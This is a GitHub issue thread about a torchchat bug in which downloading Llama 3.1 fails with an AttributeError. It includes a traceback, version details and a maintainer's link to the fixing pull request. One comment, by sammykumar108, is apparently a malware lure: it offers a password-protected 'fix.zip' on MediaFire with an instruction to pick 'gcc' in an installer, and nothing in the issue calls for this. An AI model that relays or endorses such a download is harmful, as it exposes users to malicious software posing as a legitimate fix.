### ISSUE TITLE
download for 3.1 is broken

### ISSUE THREAD

**Issue by byjlw** [pytorch/torchchat#1069]
### 🐛 Describe the bug

The following commands will throw an exception. 
`python3 torchchat.py generate llama3.1 --prompt "write me a story about a boy and his bear"`
`python3 torchchat.py download llama3.1`

```
onverting meta-llama/Meta-Llama-3.1-8B-Instruct to torchchat format...
Traceback (most recent call last):
  File "/Users/jessewhite/Documents/source/torchchat/torchchat.py", line 97, in <module>
    download_main(args)
  File "/Users/jessewhite/Documents/source/torchchat/download.py", line 198, in download_main
    download_and_convert(args.model, args.model_directory, args.hf_token)
  File "/Users/jessewhite/Documents/source/torchchat/download.py", line 91, in download_and_convert
    _download_hf_snapshot(model_config, temp_dir, hf_token)
  File "/Users/jessewhite/Documents/source/torchchat/download.py", line 55, in _download_hf_snapshot
    convert_hf_checkpoint(
  File "/Users/jessewhite/Documents/source/torchchat/.venv/lib/python3.11/site-packages/torch/utils/_contextlib.py", line 116, in decorate_context
    return func(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^
  File "/Users/jessewhite/Documents/source/torchchat/build/convert_hf_checkpoint.py", line 35, in convert_hf_checkpoint
    config = TransformerArgs.from_name(model_name)
             ^^^^^^^^^^^^^^^^^^^^^^^^^
AttributeError: type object 'TransformerArgs' has no attribute 'from_name'

```

### Versions

Collecting environment information...
PyTorch version: 2.5.0.dev20240814
Is debug build: False
CUDA used to build PyTorch: None
ROCM used to build PyTorch: N/A

OS: macOS 14.1 (arm64)
GCC version: Could not collect
Clang version: 15.0.0 (clang-1500.1.0.2.5)
CMake version: version 3.30.2
Libc version: N/A

Python version: 3.11.8 (v3.11.8:db85d51d3e, Feb  6 2024, 18:02:37) [Clang 13.0.0 (clang-1300.0.29.30)] (64-bit runtime)
Python platform: macOS-14.1-arm64-arm-64bit
Is CUDA available: False
CUDA runtime version: No CUDA
CUDA_MODULE_LOADING set to: N/A
GPU models and configuration: No CUDA
Nvidia driver version: No CUDA
cuDNN version: No CUDA
HIP runtime version: N/A
MIOpen runtime version: N/A
Is XNNPACK available: True

CPU:
Apple M3 Max

Versions of relevant libraries:
[pip3] numpy==1.26.4
[pip3] torch==2.5.0.dev20240814
[pip3] torchao==0.4.0+gite11201a
[conda] Could not collect

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Gasoonjia** [comment]
I recently merged a PR that related to TransformerArgs. Let me check

**Comment by Gasoonjia** [comment]
https://github.com/pytorch/torchchat/pull/1071 this PR solves the issue. @byjlw please take a look if have time!
